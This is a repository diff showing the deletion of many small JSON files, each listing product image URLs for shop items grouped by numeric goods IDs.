["https:\/\/s3.ibta.ru\/goods\/102851\/b74ebd5381dca6f5dd86e3f2de8f379d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/b6b477b75fb57b7c9edf39021a2e9562_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/bfc95aab40a4a714ff4cbc7bcbbc45e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/213b6237d0312e82898a75eb3505b232_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/efda8d6228b665fab6d6e0e5a6f8745e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/f46be88fbd2b2774ab4fe33e6cab5dde_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/0bd8d303c4e2951875b719609197af7b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102851\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102852\/d7f6eb36bfee47adf6186ad2eaf69152_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/21fb554107438fc6222ba81d70b16b59_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/985ca40b2e923f62e5297b0a01774ff2_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/d6221f1b9b5c5fdd9de417173575a9f4_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/ba25a441df15de6c2f9e33eebf15254f_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/6e1c80690569c38a71a7900d395f5a69_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102852\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102880\/4fc8a62915c06_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102880\/52fcb774720a1_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102881\/4fc5c4f0af41b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102881\/52fcb7b59cc0d_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102882\/4fc5d0770aaef_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102882\/52fcb8411836b_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102884\/4fc8a62b8d133_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102884\/52fcb9ca8ecbf_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103018\/4fd3348b25e39_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103018\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103018\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103023\/0c1fb2bb43a07cf001612a83fa64ae47_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/530f4a16155464e96c9a5bc1533a0b19_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/7c522cf48286a55033b4ad66e3f15911_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/c82ca42806989ff9a7fc4fc7edb03a0c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/66cfdb623245db2884cdc945af5f1855_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/529682819e7fa1ee172cb93f6766ff46_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/0bc88552290c8122fe8416bd61dbdca2_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/f4b303bad5d9f8d409e1ec5ee2022b09_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/58eb43f8b2baae256a918c781a9d7712_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/635569fbdbed0bf09271daae9f18470a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103023\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103027\/ccc2d0b67a36562b2e6723bd89fd5752_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/a848844408265aaa913d51e6710d5b6c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/f5559fc055bca40ebcf3d535f9d825d3_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/b955aa6d2a4938019b6e3197ce222d09_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/338051079df9eb99012b4d5a807a4115_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/fb20e364b0a1344fc233051dcc23d629_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/cd1ec6f1f3b127cbb63b3b2b10dffac1_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/0e36704e7ce448be95969eff3ce5b3e5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/4c1f0f0e8818543a05376b31101d4e19_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/7b9708521771c130b0b0db8024d06b81_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103027\/8ca8851eb53da20564d1ac61c68c0e9d_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103033\/ece7125d935a709561448dab46f1f5d0_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/735db7d90e06441d288443b0c176faf0_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/3242db231189f3f441010cfe755270a5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/049eec5aa12fa97833ff64b4f9d4cc86_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/77fae95c0ae7d24902251717c8b1be1c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/1256e0d2d0aadaece3d818bf3fea89b4_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/5a68cceb4565e0b11570406d708643ce_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/534fb71e8fe8e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/4c0cd1ccae15989596982d8d81a350bb_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/eebe5ff2e6da8fd9de415c5d86e82817_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103033\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103051\/471faf13c14a391a2a3188010df138c3_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103051\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103051\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103116\/50d2ac0644459_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103116\/50d2ac15b0bcd_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103117\/50d2ac0a0210f_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103117\/50d2ac1ac43f7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103117\/4ad0b7e869d8c20e198f7ce656f748ee_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103182\/513888c45a9b7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103182\/513888c77b97e_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103183\/5138530712740_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103183\/51388b47358be_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103184\/51385300a1b03_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103184\/513888cc96a52_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103185\/513888c950482_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103185\/5138530244d40_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103206\/1e7683e293384378fe17bb16443807dc_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103206\/89ed74b6439c458c63ec4ac8009ecb49_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103256\/064e139158003dbd2dcd9083f8d8a561_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103256\/a558df1fcd8ab8ed067edc3b1316d063_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103256\/ae3d1fd95307be153b1169af28ae94f8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103256\/e268bec1077b13cea038b655784bf286_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103256\/07390efbf111a26e40c1260f640da01d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103256\/682b27f1cf81536f2fabb4ab5b4956d5_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103272\/eb6aab165ff92a72c36d25d936487c22_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103272\/327fad54c260f5787b838245e67614a6_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103272\/2f88cc5ee9b786a340ef1818b2dc30b8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103272\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103272\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103273\/06799f53fdaaab12f69b5f57a768fcbf_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103273\/3e6f3a4514d99889987d3f751c07ddad_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103273\/ecb6d86e7f177da75cfb95f2aa821b6a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103273\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103273\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103274\/7a6f5d6a10225e44f6ce7defa954d2bd_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103274\/2eae65a384a6585200894ac38224c670_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103274\/9a525f4110aa2eef9ee9e33c3a067fa7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103274\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103274\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103276\/bee63725f5c31270a6e2dff41d5b9ee0_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103276\/5350cf5f01a81_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103276\/ece98514181145a7c143729821c26891_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103276\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103276\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/103277\/5d0fb5a6dfc71c327367edaff8eee770_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103277\/534e1e2727dd6_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103277\/eaac813e7d84ad4b358bd1514a98c755_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103277\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/103277\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

Some files were not shown because too many files have changed in this diff Show More